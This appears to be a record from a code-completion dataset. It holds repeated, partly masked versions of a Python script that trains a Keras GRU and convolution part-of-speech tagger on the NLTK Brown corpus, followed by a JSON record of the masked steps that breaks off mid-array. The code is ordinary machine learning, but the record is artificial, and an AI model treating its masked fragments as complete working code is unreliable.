model.add(L.TimeDistributed(L.Dense(256, activation='tanh')))
model.add(L.Dropout(0.25))
<|reserved_special_token_0|>
model.add(stepwise_dense)
model.summary()
model.compile('adam', 'categorical_crossentropy')
model.fit_generator(generate_batches(train_data), len(train_data) /
BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)
<|reserved_special_token_0|>
print("""
Final accuracy: %.5f""" % acc)
model.save_weights('LSTM_gpu_trained_weights_1layer.h5')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
sys.path.append('..')
<|reserved_special_token_0|>
helpers.mask_busy_gpus(wait=False)
<|reserved_special_token_0|>
nltk.download('brown')
nltk.download('universal_tagset')
data = nltk.corpus.brown.tagged_sents(tagset='universal')
all_tags = ['#EOS#', '#UNK#', 'ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.',
'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']
data = np.array([[(word.lower(), tag) for word, tag in sentence] for
sentence in data])
<|reserved_special_token_0|>
train_data, test_data = train_test_split(data, test_size=0.25, random_state=42)
<|reserved_special_token_0|>
word_counts = Counter()
for sentence in data:
words, tags = zip(*sentence)
word_counts.update(words)
all_words = ['#EOS#', '#UNK#'] + list(list(zip(*word_counts.most_common(
10000)))[0])
print('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /
sum(word_counts.values())))
<|reserved_special_token_0|>
word_to_id = defaultdict(lambda : 1, {word: i for i, word in enumerate(
all_words)})
tag_to_id = {tag: i for i, tag in enumerate(all_tags)}
def to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',
time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len, lines))
matrix = np.empty([len(lines), max_len], dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]
matrix[i, :len(line_ix)] = line_ix
return matrix.T if time_major else matrix
batch_words, batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])
print('Word ids:')
print(to_matrix(batch_words, word_to_id))
print('Tag ids:')
print(to_matrix(batch_tags, tag_to_id))
<|reserved_special_token_0|>
BATCH_SIZE = 32
def generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):
assert isinstance(sentences, np.ndarray
), 'Make sure sentences is q numpy array'
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0, len(indices) - 1, batch_size):
batch_indices = indices[start:start + batch_size]
batch_words, batch_tags = [], []
for sent in sentences[batch_indices]:
words, tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words, word_to_id, max_len, pad)
batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)
batch_tags_1hot = to_categorical(batch_tags, len(all_tags)
).reshape(batch_tags.shape + (-1,))
yield batch_words, batch_tags_1hot
def compute_test_accuracy(model):
test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(
test_tags, tag_to_id)
predicted_tag_probabilities = model.predict(test_words, verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
numerator = np.sum(np.logical_and(predicted_tags == test_tags,
test_words != 0))
denominator = np.sum(test_words != 0)
return float(numerator) / denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self, epoch, logs=None):
sys.stdout.flush()
print('\nMeasuring validation accuracy...')
acc = compute_test_accuracy(self.model)
print('\nValidation accuracy: %.5f\n' % acc)
sys.stdout.flush()
model = keras.models.Sequential()
model = keras.models.Sequential()
model.add(L.InputLayer([None], dtype='int32'))
model.add(L.Embedding(len(all_words), 50))
model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128, activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=
'tanh', recurrent_dropout=0.2, dropout=0.2)))
model.add(L.Conv1D(128, 2, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 3, padding='same', activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128, 4, padding='same', activation='tanh'))
model.add(L.TimeDistributed(L.Dense(256, activation='tanh')))
model.add(L.Dropout(0.25))
stepwise_dense = L.Dense(len(all_tags), activation='softmax')
stepwise_dense = L.TimeDistributed(stepwise_dense)
model.add(stepwise_dense)
model.summary()
model.compile('adam', 'categorical_crossentropy')
model.fit_generator(generate_batches(train_data), len(train_data) /
BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)
acc = compute_test_accuracy(model)
print("""
Final accuracy: %.5f""" % acc)
model.save_weights('LSTM_gpu_trained_weights_1layer.h5')
<|reserved_special_token_1|>
import sys
sys.path.append("..")
import helpers
helpers.mask_busy_gpus(wait=False)
import nltk
import numpy as np
nltk.download('brown')
nltk.download('universal_tagset')
data = nltk.corpus.brown.tagged_sents(tagset='universal')
all_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']
data = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])
from sklearn.cross_validation import train_test_split
train_data,test_data = train_test_split(data,test_size=0.25,random_state=42)
from collections import Counter
word_counts = Counter()
for sentence in data:
words,tags = zip(*sentence)
word_counts.update(words)
all_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])
#print(all_words)
#let's measure what fraction of data words are in the dictionary
print("Coverage = %.5f"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))
from collections import defaultdict
word_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})
tag_to_id = {tag:i for i,tag in enumerate(all_tags)}
def to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):
"""Converts a list of names into rnn-digestable matrix with paddings added after the end"""
max_len = max_len or max(map(len,lines))
matrix = np.empty([len(lines),max_len],dtype)
matrix.fill(pad)
for i in range(len(lines)):
line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]
matrix[i,:len(line_ix)] = line_ix
return matrix.T if time_major else matrix
batch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])
print("Word ids:")
print(to_matrix(batch_words,word_to_id))
print("Tag ids:")
print(to_matrix(batch_tags,tag_to_id))
import keras
import keras.layers as L
from keras.utils.np_utils import to_categorical
BATCH_SIZE=32
def generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):
assert isinstance(sentences,np.ndarray),"Make sure sentences is q numpy array"
while True:
indices = np.random.permutation(np.arange(len(sentences)))
for start in range(0,len(indices)-1,batch_size):
batch_indices = indices[start:start+batch_size]
batch_words,batch_tags = [],[]
for sent in sentences[batch_indices]:
words,tags = zip(*sent)
batch_words.append(words)
batch_tags.append(tags)
batch_words = to_matrix(batch_words,word_to_id,max_len,pad)
batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)
batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))
yield batch_words,batch_tags_1hot
def compute_test_accuracy(model):
test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])
test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)
#predict tag probabilities of shape [batch,time,n_tags]
predicted_tag_probabilities = model.predict(test_words,verbose=1)
predicted_tags = predicted_tag_probabilities.argmax(axis=-1)
#compute accurary excluding padding
numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))
denominator = np.sum(test_words != 0)
return float(numerator)/denominator
class EvaluateAccuracy(keras.callbacks.Callback):
def on_epoch_end(self,epoch,logs=None):
sys.stdout.flush()
print("\nMeasuring validation accuracy...")
acc = compute_test_accuracy(self.model)
print("\nValidation accuracy: %.5f\n"%acc)
sys.stdout.flush()
model = keras.models.Sequential()
model = keras.models.Sequential()
model.add(L.InputLayer([None],dtype='int32'))
model.add(L.Embedding(len(all_words),50))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(96,activation='tanh')))
model.add(L.Dropout(0.25))
#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
model.add(L.Dropout(0.25))
#
#
model.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))
model.add(L.Conv1D(128,2,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,3,padding='same',activation='tanh'))
model.add(L.Dropout(0.2))
model.add(L.Conv1D(128,4,padding='same',activation='tanh'))
model.add(L.TimeDistributed(L.Dense(256,activation='tanh')))
model.add(L.Dropout(0.25))
#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))
#model.add(L.Dropout(0.25))
stepwise_dense = L.Dense(len(all_tags),activation='softmax')
stepwise_dense = L.TimeDistributed(stepwise_dense)
model.add(stepwise_dense)
model.summary()
model.compile('adam','categorical_crossentropy')
model.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,
callbacks=[EvaluateAccuracy()], epochs=50,)
acc = compute_test_accuracy(model)
print("\nFinal accuracy: %.5f"%acc)
model.save_weights("LSTM_gpu_trained_weights_1layer.h5")
|
flexible
|
{
"blob_id": "7f7ebc6d3d69fbb19071c63a9ab235ad01f1d414",
"index": 306,
"step-1": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\n<mask token>\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\n",
"step-3": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\n<mask token>\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\n<mask token>\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\n<mask token>\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\n<mask token>\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\n<mask token>\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\n<mask token>\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-4": "<mask token>\nsys.path.append('..')\n<mask token>\nhelpers.mask_busy_gpus(wait=False)\n<mask token>\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#', '#UNK#', 'ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.',\n 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\ndata = np.array([[(word.lower(), tag) for word, tag in sentence] for\n sentence in data])\n<mask token>\ntrain_data, test_data = train_test_split(data, test_size=0.25, random_state=42)\n<mask token>\nword_counts = Counter()\nfor sentence in data:\n words, tags = zip(*sentence)\n word_counts.update(words)\nall_words = ['#EOS#', '#UNK#'] + list(list(zip(*word_counts.most_common(\n 10000)))[0])\nprint('Coverage = %.5f' % (float(sum(word_counts[w] for w in all_words)) /\n sum(word_counts.values())))\n<mask token>\nword_to_id = defaultdict(lambda : 1, {word: i for i, word in enumerate(\n all_words)})\ntag_to_id = {tag: i for i, tag in enumerate(all_tags)}\n\n\ndef to_matrix(lines, token_to_id, max_len=None, pad=0, dtype='int32',\n time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n max_len = max_len or max(map(len, lines))\n matrix = np.empty([len(lines), max_len], dtype)\n matrix.fill(pad)\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__, lines[i]))[:max_len]\n matrix[i, :len(line_ix)] = line_ix\n return matrix.T if time_major else matrix\n\n\nbatch_words, batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\nprint('Word ids:')\nprint(to_matrix(batch_words, word_to_id))\nprint('Tag ids:')\nprint(to_matrix(batch_tags, tag_to_id))\n<mask token>\nBATCH_SIZE = 32\n\n\ndef generate_batches(sentences, batch_size=BATCH_SIZE, max_len=None, pad=0):\n assert isinstance(sentences, np.ndarray\n ), 'Make sure sentences is q numpy array'\n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0, len(indices) - 1, batch_size):\n batch_indices = indices[start:start + batch_size]\n batch_words, batch_tags = [], []\n for sent in sentences[batch_indices]:\n words, tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n batch_words = to_matrix(batch_words, word_to_id, max_len, pad)\n batch_tags = to_matrix(batch_tags, tag_to_id, max_len, pad)\n batch_tags_1hot = to_categorical(batch_tags, len(all_tags)\n ).reshape(batch_tags.shape + (-1,))\n yield batch_words, batch_tags_1hot\n\n\ndef compute_test_accuracy(model):\n test_words, test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words, test_tags = to_matrix(test_words, word_to_id), to_matrix(\n test_tags, tag_to_id)\n predicted_tag_probabilities = model.predict(test_words, verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n numerator = np.sum(np.logical_and(predicted_tags == test_tags, \n test_words != 0))\n denominator = np.sum(test_words != 0)\n return float(numerator) / denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n\n def on_epoch_end(self, epoch, logs=None):\n sys.stdout.flush()\n print('\\nMeasuring validation accuracy...')\n acc = compute_test_accuracy(self.model)\n print('\\nValidation accuracy: %.5f\\n' % acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None], dtype='int32'))\nmodel.add(L.Embedding(len(all_words), 50))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128, return_sequences=True, activation=\n 'tanh', recurrent_dropout=0.2, dropout=0.2)))\nmodel.add(L.Conv1D(128, 2, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 3, padding='same', activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128, 4, padding='same', activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256, activation='tanh')))\nmodel.add(L.Dropout(0.25))\nstepwise_dense = L.Dense(len(all_tags), activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\nmodel.summary()\nmodel.compile('adam', 'categorical_crossentropy')\nmodel.fit_generator(generate_batches(train_data), len(train_data) /\n BATCH_SIZE, callbacks=[EvaluateAccuracy()], epochs=50)\nacc = compute_test_accuracy(model)\nprint(\"\"\"\nFinal accuracy: %.5f\"\"\" % acc)\nmodel.save_weights('LSTM_gpu_trained_weights_1layer.h5')\n",
"step-5": "import sys\nsys.path.append(\"..\")\nimport helpers\nhelpers.mask_busy_gpus(wait=False)\n\n\n\nimport nltk\n\nimport numpy as np\nnltk.download('brown')\nnltk.download('universal_tagset')\ndata = nltk.corpus.brown.tagged_sents(tagset='universal')\nall_tags = ['#EOS#','#UNK#','ADV', 'NOUN', 'ADP', 'PRON', 'DET', '.', 'PRT', 'VERB', 'X', 'NUM', 'CONJ', 'ADJ']\n\ndata = np.array([ [(word.lower(),tag) for word,tag in sentence] for sentence in data ])\n\nfrom sklearn.cross_validation import train_test_split\ntrain_data,test_data = train_test_split(data,test_size=0.25,random_state=42)\n\nfrom collections import Counter\nword_counts = Counter()\nfor sentence in data:\n words,tags = zip(*sentence)\n \n word_counts.update(words)\n\nall_words = ['#EOS#','#UNK#']+list(list(zip(*word_counts.most_common(10000)))[0])\n#print(all_words)\n#let's measure what fraction of data words are in the dictionary\nprint(\"Coverage = %.5f\"%(float(sum(word_counts[w] for w in all_words)) / sum(word_counts.values())))\n\nfrom collections import defaultdict\nword_to_id = defaultdict(lambda:1,{word:i for i,word in enumerate(all_words)})\ntag_to_id = {tag:i for i,tag in enumerate(all_tags)}\n\ndef to_matrix(lines,token_to_id,max_len=None,pad=0,dtype='int32',time_major=False):\n \"\"\"Converts a list of names into rnn-digestable matrix with paddings added after the end\"\"\"\n \n max_len = max_len or max(map(len,lines))\n matrix = np.empty([len(lines),max_len],dtype)\n matrix.fill(pad)\n\n for i in range(len(lines)):\n line_ix = list(map(token_to_id.__getitem__,lines[i]))[:max_len]\n matrix[i,:len(line_ix)] = line_ix\n\n return matrix.T if time_major else matrix\n\nbatch_words,batch_tags = zip(*[zip(*sentence) for sentence in data[-3:]])\n\nprint(\"Word ids:\")\nprint(to_matrix(batch_words,word_to_id))\nprint(\"Tag ids:\")\nprint(to_matrix(batch_tags,tag_to_id))\n\nimport keras\nimport keras.layers as L\n\nfrom keras.utils.np_utils import to_categorical\nBATCH_SIZE=32\ndef generate_batches(sentences,batch_size=BATCH_SIZE,max_len=None,pad=0):\n assert isinstance(sentences,np.ndarray),\"Make sure sentences is q numpy array\"\n \n while True:\n indices = np.random.permutation(np.arange(len(sentences)))\n for start in range(0,len(indices)-1,batch_size):\n batch_indices = indices[start:start+batch_size]\n batch_words,batch_tags = [],[]\n for sent in sentences[batch_indices]:\n words,tags = zip(*sent)\n batch_words.append(words)\n batch_tags.append(tags)\n\n batch_words = to_matrix(batch_words,word_to_id,max_len,pad)\n batch_tags = to_matrix(batch_tags,tag_to_id,max_len,pad)\n\n batch_tags_1hot = to_categorical(batch_tags,len(all_tags)).reshape(batch_tags.shape+(-1,))\n yield batch_words,batch_tags_1hot\n \ndef compute_test_accuracy(model):\n test_words,test_tags = zip(*[zip(*sentence) for sentence in test_data])\n test_words,test_tags = to_matrix(test_words,word_to_id),to_matrix(test_tags,tag_to_id)\n\n #predict tag probabilities of shape [batch,time,n_tags]\n predicted_tag_probabilities = model.predict(test_words,verbose=1)\n predicted_tags = predicted_tag_probabilities.argmax(axis=-1)\n\n #compute accurary excluding padding\n numerator = np.sum(np.logical_and((predicted_tags == test_tags),(test_words != 0)))\n denominator = np.sum(test_words != 0)\n return float(numerator)/denominator\n\n\nclass EvaluateAccuracy(keras.callbacks.Callback):\n def on_epoch_end(self,epoch,logs=None):\n sys.stdout.flush()\n print(\"\\nMeasuring validation accuracy...\")\n acc = compute_test_accuracy(self.model)\n print(\"\\nValidation accuracy: %.5f\\n\"%acc)\n sys.stdout.flush()\n\n\nmodel = keras.models.Sequential()\n\nmodel = keras.models.Sequential()\nmodel.add(L.InputLayer([None],dtype='int32'))\nmodel.add(L.Embedding(len(all_words),50))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(96,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.Conv1D(32,3,padding='same',activation='tanh'))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\nmodel.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#\n\n#\nmodel.add(L.Bidirectional(L.GRU(128,return_sequences=True,activation='tanh',recurrent_dropout=0.2,dropout=0.2)))\n\nmodel.add(L.Conv1D(128,2,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,3,padding='same',activation='tanh'))\nmodel.add(L.Dropout(0.2))\nmodel.add(L.Conv1D(128,4,padding='same',activation='tanh'))\nmodel.add(L.TimeDistributed(L.Dense(256,activation='tanh')))\nmodel.add(L.Dropout(0.25))\n#model.add(L.TimeDistributed(L.Dense(128,activation='tanh')))\n#model.add(L.Dropout(0.25))\n\nstepwise_dense = L.Dense(len(all_tags),activation='softmax')\nstepwise_dense = L.TimeDistributed(stepwise_dense)\nmodel.add(stepwise_dense)\n\nmodel.summary()\nmodel.compile('adam','categorical_crossentropy')\n\nmodel.fit_generator(generate_batches(train_data),len(train_data)/BATCH_SIZE,\n callbacks=[EvaluateAccuracy()], epochs=50,)\n\n\nacc = compute_test_accuracy(model)\nprint(\"\\nFinal accuracy: %.5f\"%acc)\n\nmodel.save_weights(\"LSTM_gpu_trained_weights_1layer.h5\")\n",
"step-ids": [
4,
5,
